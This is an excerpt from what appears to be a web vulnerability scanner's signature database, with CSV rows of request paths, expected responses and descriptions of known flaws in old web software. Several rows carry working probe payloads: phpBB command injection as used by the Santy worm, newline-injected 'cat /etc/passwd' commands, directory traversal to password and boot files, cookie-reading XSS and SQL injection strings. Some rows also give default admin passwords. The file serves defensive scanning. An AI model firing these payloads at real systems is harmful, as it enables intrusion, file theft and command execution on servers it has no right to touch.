"001393","11719","89","/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","<DIR>","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001394","11719","89","/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001395","11719","89","/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001396","11719","89","/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001397","11719","89","@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001398","11719","89","@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001399","11719","89","@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001400","11719","89","/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","GET","drwx","","","","","phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.","",""
"001401","136","8","@CGIDIRSphf?Qname=root%0Acat%20/etc/passwd%20","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","",""
"001402","136","8","@CGIDIRSphf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","",""
"001403","136","8","@CGIDIRSphf","GET","200","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","",""
"001404","228","0","@CGIDIRSupload.cgi","GET","200","","","","","The upload.cgi allows attackers to upload arbitrary files to the server.","",""
"001405","228","0","/upload.cgi+","GET","200","","","","","The upload.cgi allows attackers to upload arbitrary files to the server.","",""
"001406","561","3","/server-status","GET","200","Server Version","","","","This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","",""
"001407","119","3","/?PageServices","GET","[Ii]ndex [Oo]f ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","",""
"001408","119","3","/?wp-cs-dump","GET","[Ii]ndex [Oo]f ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","",""
"001409","1193","3","/cfdocs.map","GET","\.tmp","","","","","Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information. CVE-2000-0057.","",""
"001410","1264","b","/publisher/","GET","200","","","","","Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. CVE-2000-0237.","",""
"001411","127","8","@CGIDIRSnph-publish.cgi","GET","200","","","","","This CGI may allow attackers to execute arbitrary commands on the server.","",""
"001412","128","3","@CGIDIRSnph-test-cgi","GET","200","","","","","This CGI lets attackers get a directory listing of the CGI directory.","",""
"001413","134","7","/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd","GET","root:","200","","","","Comes with IRIX 6.2-6.4; allows to run arbitrary commands","",""
"001414","134","7","@CGIDIRSpfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'","GET","root:","","","","","This allows attackers to execute arbitrary commands on the host.","",""
"001415","134","7","@CGIDIRSpfdispaly.cgi?../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the host.","",""
"001416","134","7","@CGIDIRSpfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'","GET","root:","","","","","This allows attackers to execute arbitrary commands on the host.","",""
"001417","155","6","/counter/1/n/n/0/3/5/0/a/123.gif","GET","200","","","","","The Roxen Counter may eat up excessive CPU time with image requests.","",""
"001418","2","6","/iissamples/exair/search/search.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","",""
"001419","2087","7","@CGIDIRSwebcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD","GET","root:","","","","","webcart.cgi allows remote command execution. Upgrade to the latest version.","",""
"001420","2091","5","/../webserver.ini","GET","Authentic","","","","","Nuca WebServer allows retrieval of the web server configuration.","",""
"001421","2117","2","/","GET","ESS Launch","","","","","Default IBM TotalStorage server found.","",""
"001422","2117","2","/na_admin/","GET","Network Appliance","","","","","Default Network Appliance server found.","",""
"001423","2117","2","/","GET","Celerra Web Manager","","","","","Default EMC Cellera manager server is running.","",""
"001424","2117","2","/","GET","EMC ControlCenter","","","","","Default EMC ControlCenter manager server is running.","",""
"001425","2117","2","/cpqlogin.htm","GET","System Management Homepage","","","","","Default Compaq/HP WBEM server is running.","",""
"001426","2117","2","/cpqlogin.htm","GET","This is a private system","","","","","Defaul Compaq/HP WBEM server is running.","",""
"001427","2117","2","/","GET","DHost HTTP Server","","","","","Default Novell NDS iMonitor was found. Default account may be 'sadmin' with no password.","",""
"001428","2117","2","/","GET","AnswerBook","","","","","Default Sun Answerbook server running.","",""
"001429","2117","2","/","GET","Allaire Corporateion","","","","","Default JRun 2 server running.","",""
"001430","2117","2","/","GET","Cisco IP Phone","","","","","Cisco VoIP Phone default web server found.","",""
"001431","2117","2","/","GET","Jaguar CTS","","","","","Default Sybase Jaguar CTS server running.","",""
"001432","2117","2","/","GET","Jrun Management Console","","","","","Default JRun 3 server running.","",""
"001433","2117","2","/","GET","Lantronix","","","","","Default Lantronix printer found.","",""
"001434","2117","2","/","GET","Storage Management","","","","","Default IBM Tivoli Server Administration server is running.","",""
"001435","2117","2","/","GET","Welcome to the JMC","","","","","Default JRun 4 server running.","",""
"001436","2117","2","/","GET","XEROX WORKCENTRE","","","","","Default Xerox WorkCentre server is running.","",""
"001437","2117","2","/","GET","body text=\"#000000\" bgcolor=\"#000000\" style=","","","","","Appears to be a default Domino 6 install.","",""
"001438","2117","2","/","GET","Domino 5","","","","","Default Lotus Domino server running.","",""
"001439","2117","2","/","GET","<TITLE>Sambar Server<\/TITLE>","","","","","Appears to be a default Sambar install.","",""
"001441","2117","2","/","GET","\(\?:default Tomcat\|instead of the website\)","","","","","Appears to be a default Apache install.","",""
"001442","2117","2","/","GET","Test Page for Apache","","","","","Appears to be a default Apache install.","",""
"001443","2117","2","/","GET","The site you were trying to reach does not currently have a default page","","","","","Appears to be a default IIS install.","",""
"001444","2117","2","/","GET","Welcome to IIS 4\.0","","","","","Appears to be a default IIS 4.0 install.","",""
"001445","2117","2","/","GET","Welcome to Microsoft Windows NT 4","","","","","Appears to be a default IIS install.","",""
"001446","2117","2","/","GET","Web Server, Enterprise Edition 6\.0","","","","","Appears to be a default Netscape/iPlanet 6 install.","",""
"001447","2117","b","/main_page.php","GET","mazu\.css","","","","","Mazu Networks Profiler or Sensor is running.","",""
"001448","2117","b","/","GET","samba is configured to deny","","","","","Samba-swat web server. Used to administer Samba.","",""
"001449","2117","b","/cpanel/","GET","200","","","","","Web-based control panel","",""
"001450","2119","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","",""
"001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","",""
"001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CVE-1999-1376. BID-2252.","",""
"001453","2390","4","/forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""
"001454","2390","4","/zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""
"001455","250","2","/wwwboard/passwd.txt","GET","200","","","","","The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.","",""
"001456","2562","4","/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001457","2562","4","/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001458","2562","4","/SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001459","2562","4","/SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001460","2617","4","/acart2_0/signin.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""
"001461","264","3","/ows-bin/perlidlc.bat?&dir","GET","ows-bin:","","","","","The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html","",""
"001462","2695","b","/photo/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","",""
"001463","2695","b","/photodata/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","",""
"001464","2695","b","@CGIDIRSphoto/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","",""
"001465","271","2","/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits full highlighting","","","","","All default files should be removed.","",""
"001466","271","2","/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits summary highlighting\.","","","","","All default files should be removed.","",""
"001467","271","5","/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full","GET","\&lt;html\&gt;","","","","","It is possible to retrieve the source of .asp files or view any file on the system. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp. MS00-006, CVE-2000-0097.","",""
"001468","271","5","/","GET","null\.htw\?CiWebHitsFile=\/default\.asp\%20\&CiRestriction=none\&CiHiliteType=Full","","","","","It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp","",""
"001469","2713","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini","GET","boot loader","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.","",""
"001470","2713","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd","GET","root:","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.","",""
"001471","2717","8","@CGIDIRSinclude/new-visitor.inc.php","GET","200","","","","","Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.","",""
"001472","2719","3","/%3f.jsp","GET","WEB-INF","","","","","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.","",""
"001473","2719","3","/%3f.jsp","GET","WebTide","","","","","WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.","",""
"001474","272","8","/msadc/msadcs.dll","GET","200","","","not authorized","","See RDS advisory RFP9902, CVE-1999-1011, MS98-004, MS99-025 RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529","",""
"001475","2721","7","../../../../../../../../../../etc/*","GET","passwd","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
"001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","",""
"001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","",""
"001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""
"001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
"001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","",""
"001481","275","3","/scripts/tools/newdsn.exe","GET","200","","","","","This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
"001482","2780","7","/OpenFile.aspx?file=../../../../../../../../../../boot.ini","GET","boot loader","","","","","HTTP Commander 4.0 allows directory traversal and reading of arbitrary files.","",""
"001483","279","7","@CGIDIRSwindmail","GET","200","","","","","Some versions are vulnerable. Request 'windmail?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file","",""
"001484","279","7","@CGIDIRSwindmail.exe","GET","200","","","","","Some versions are vulnerable. Request 'windmail.exe?-n%20c:\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file","",""
"001485","279","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%","GET","boot loader","","","","","WINDMAIL.EXE can read arbitrary files","",""
"001486","279","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\","GET","200","","","","","WINDMAIL.EXE can read arbitrary files","",""
"001487","2790","4","/index.php?vo=\"><script>alert(document.cookie);</script>","GET","><script>alert\(document\.cookie\);<\/script>","","","","","Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"001488","2793","7","/.../.../.../.../.../.../.../.../.../.../etc/passwd","GET","root:","","","","","TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal.","",""
"001489","2799","8","@CGIDIRSdose.pl?daily&somefile.txt&|ls|","GET","somefile\.txt","","","","","DailyDose 1.1 is vulnerable to a directory traversal attack in the 'list' parameter.","",""
"001490","2813","4","/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","",""
"001491","2830","5","/../config.dat","GET","EnablePasswords","","","","","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.","",""
"001492","284","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
"001493","284","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
"001494","284","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
"001495","284","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
"001496","284","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","",""
"001497","2842","a","//admin/aindex.htm","GET","200","","","","","FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt","",""
"001498","2873","a","@CGIDIRSgbadmin.cgi?action=change_adminpass","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","",""
"001499","2873","a","@CGIDIRSgbadmin.cgi?action=change_automail","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","",""
"001500","2873","a","@CGIDIRSgbadmin.cgi?action=colors","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","",""
"001501","2873","a","@CGIDIRSgbadmin.cgi?action=setup","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","",""
"001502","2915","a","@CGIDIRSgbpass.pl","GET","200","","","",""," RNN Guestbook 1.2 password storage file. Administrative password should be stored in plaintext. Access gbadmin.cgi in the same directory to (ab)use. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 2003 BugTraq post by brainrawt@ha","",""
"001503","2921","4","/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","GET","<script>alert\('test'\)<\/script>","","","","","VP-ASP prior to 4.50 are vulnerable to XSS attacks","",""
"001504","2921","4","shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","VP-ASP Shopping Cart 4.x shopdisplayproducts.asp XSS.","",""
"001505","2922","3","/admin/wg_user-info.ml","GET","200","","","","","WebGate Web Eye exposes user names and passwords.","",""
"001506","2927","4","/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%'/*","GET","Statistics for your banner","","","","","Xoops 1.3.x, 2.0.x thru 2.0.5 are vulnerable to SQL injection in the banners.php file. Upgrade to 2.0.5.1 or higher.","",""
"001507","294","a","/c32web.exe/ChangeAdminPassword","GET","200","","","","","This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.","",""
"001508","2944","3","/showmail.pl","GET","200","","","","","@Mail WebMail 3.52 allows attacker to read arbitrary user's mailbox. Requires knowing valid user name and appending ?Folder=../../victim@somehost.com/mbox/Inbox to the showmail.pl file.","",""
"001509","2948","9","/reademail.pl","GET","200","","","","","@Mail WebMail 3.52 contains an SQL injection that allows attacker to read any email message for any address registered in the system. Example to append to reademail.pl: ?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1","",""
"001510","2950","4","/showmail.pl?Folder=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","404","","@Mail WebMail 3.52 contains an XSS in the showmail.pl file.","",""
"001511","3","6","/iissamples/exair/search/query.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","",""
"001512","3058","9","/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=[sqlgoeshere]","GET","query error","","mySQL error","","","Invision Power Board 2.0alpha3 and before are vulnerable to an SQL injection attack.","",""
"001513","3059","9","/index.php?offset=[%20Problem%20Here%20]","GET","error in your SQL syntax","","","","","Invision Power Top Site List 1.1 contains an SQL injection vulnerability.","",""
"001514","3092","1","/buddies.blt","GET","200","","","","","Buddy List?","",""
"001515","3092","1","/buddy.blt","GET","200","","","","","Buddy List?","",""
"001516","3092","1","/buddylist.blt","GET","200","","","","","Buddy List?","",""
"001517","3092","1","@CGIDIRSaddalink.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001518","3092","1","@CGIDIRScgiecho","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001519","3092","1","@CGIDIRScgiemail","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001520","3092","1","@CGIDIRScountedit","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001521","3092","1","@CGIDIRSdomainredirect.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001522","3092","1","@CGIDIRSentropybanner.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001523","3092","1","@CGIDIRSentropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/","GET","(Permission denied|No matches)","","","","","CPanel's Entropy Search allows username enumeration via the user parameter.","",""
"001524","3092","1","@CGIDIRSFormMail-clone.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001525","3092","1","@CGIDIRShelpdesk.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001526","3092","1","@CGIDIRSmchat.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001527","3092","1","@CGIDIRSrandhtml.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001528","3092","1","@CGIDIRSrealhelpdesk.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001529","3092","1","@CGIDIRSrealsignup.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001530","3092","1","@CGIDIRSscgiwrap","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001531","3092","1","@CGIDIRSsignup.cgi","GET","200","","","","","Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web","",""
"001532","3268","12","/pdf/","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"001533","3092","1","/sqlnet.log","GET","200","","","","","Oracle log file found.","",""
"001534","3092","1","@CGIDIRSGW5/GWWEB.EXE","GET","200","","","","","Groupwise web interface","",""
"001535","3092","1","/.psql_history","GET","200","","","","","This might be interesting...","",""
"001536","3092","1","/acceso/","GET","200","","","","","This might be interesting...","",""
"001537","3092","1","/access-log","GET","200","","","","","This might be interesting...","",""
"001538","3092","1","/access.log","GET","200","","","","","This might be interesting...","",""
"001539","3092","1","/access/","GET","200","","","","","This might be interesting...","",""
"001540","3092","1","/access_log","GET","200","","","","","This might be interesting...","",""
"001541","3092","1","/acciones/","GET","200","","","","","This might be interesting...","",""
"001542","3092","1","/account/","GET","200","","","","","This might be interesting...","",""
"001543","3092","1","/accounting/","GET","200","","","","","This might be interesting...","",""
"001544","3092","1","/activex/","GET","200","","","","","This might be interesting...","",""
"001545","3092","1","/adm/","GET","200","","","","","This might be interesting...","",""
"001546","3092","1","/admin.htm","GET","200","","","","","This might be interesting...","",""
"001547","3092","1","/admin.html","GET","200","","","","","This might be interesting...","",""
"001548","3092","1","/admin.php","GET","200","","","","","This might be interesting...","",""
"001549","3092","1","/admin.php3","GET","200","","","","","This might be interesting...","",""
"001550","3092","1","/admin.shtml","GET","200","","","","","This might be interesting...","",""
"001551","3092","1","/admin/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"001552","3092","1","/Administration/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"001553","3092","1","/administration/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"001554","3092","1","/administrator/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"001555","3092","1","/Admin_files/","GET","200","Directory Listing Denied","","","","This might be interesting...","",""
"001556","3092","1","/advwebadmin/","GET","200","","","","","This might be interesting...probably HostingController, www.hostingcontroller.com","",""
"001557","3092","1","/Agent/","GET","200","","","","","This might be interesting...","",""
"001558","3092","1","/Agentes/","GET","200","","","","","This might be interesting...","",""
"001559","3092","1","/agentes/","GET","200","","","","","This might be interesting...","",""
"001560","3092","1","/Agents/","GET","200","","","","","This might be interesting...","",""
"001561","3092","1","/analog/","GET","200","","","","","This might be interesting...","",""
"001562","3092","1","/apache/","GET","200","","","","","This might be interesting...","",""
"001563","3092","1","/app/","GET","200","","","","","This might be interesting...","",""
"001564","3092","1","/applicattion/","GET","200","","","","","This might be interesting...","",""
"001565","3092","1","/applicattions/","GET","200","","","","","This might be interesting...","",""
"001566","3092","1","/apps/","GET","200","","","","","This might be interesting...","",""
"001567","3092","1","/archivar/","GET","200","","","","","This might be interesting...","",""
"001568","3092","1","/archive/","GET","200","","","","","This might be interesting...","",""
"001569","3092","1","/archives/","GET","200","","","","","This might be interesting...","",""
"001570","3092","1","/archivo/","GET","200","","","","","This might be interesting...","",""
"001571","3092","1","/asp/","GET","200","","","","","This might be interesting...","",""
"001572","3092","1","/Asp/","GET","200","","","","","This might be interesting...","",""
"001573","3092","1","/atc/","GET","200","","","","","This might be interesting...","",""
"001574","3092","1","/auth/","GET","200","","","","","This might be interesting...","",""
"001575","3092","1","/awebvisit.stat","GET","200","","","","","This might be interesting...","",""
"001576","3092","1","/ayuda/","GET","200","","","","","This might be interesting...","",""
"001577","3092","1","/backdoor/","GET","200","","","","","This might be interesting...","",""
"001578","3092","1","/backup/","GET","200","","","","","This might be interesting...","",""
"001579","3092","1","/bak/","GET","200","","","","","This might be interesting...","",""
"001580","3092","1","/banca/","GET","200","","","","","This might be interesting...","",""
"001581","3092","1","/banco/","GET","200","","","","","This might be interesting...","",""
"001582","3092","1","/bank/","GET","200","","","","","This might be interesting...","",""
"001583","3092","1","/bbv/","GET","200","","","","","This might be interesting...","",""
"001584","3092","1","/bdata/","GET","200","","","","","This might be interesting...","",""
"001585","3092","1","/bdatos/","GET","200","","","","","This might be interesting...","",""
"001586","3092","1","/beta/","GET","200","","","","","This might be interesting...","",""
"001587","3092","1","/bin/","GET","200","","","","","This might be interesting...","",""
"001588","3092","1","/boot/","GET","200","","","","","This might be interesting...","",""
"001589","3092","1","/buy/","GET","200","","","","","This might be interesting...","",""
"001590","3092","1","/buynow/","GET","200","","","","","This might be interesting...","",""
"001591","3092","1","/c/","GET","200","","","","","This might be interesting...","",""
"001592","3092","1","/cache-stats/","GET","200","","","","","This might be interesting...","",""
"001593","3092","1","/caja/","GET","200","","","","","This might be interesting...","",""
"001594","3092","1","/card/","GET","200","","","","","This might be interesting...","",""
"001595","3092","1","/cards/","GET","200","","","","","This might be interesting...","",""
"001596","3092","1","/cart/","GET","200","","","","","This might be interesting...","",""
"001597","3092","1","/cash/","GET","200","","","","","This might be interesting...","",""
"001598","3092","1","/ccard/","GET","200","","","","","This might be interesting...","",""
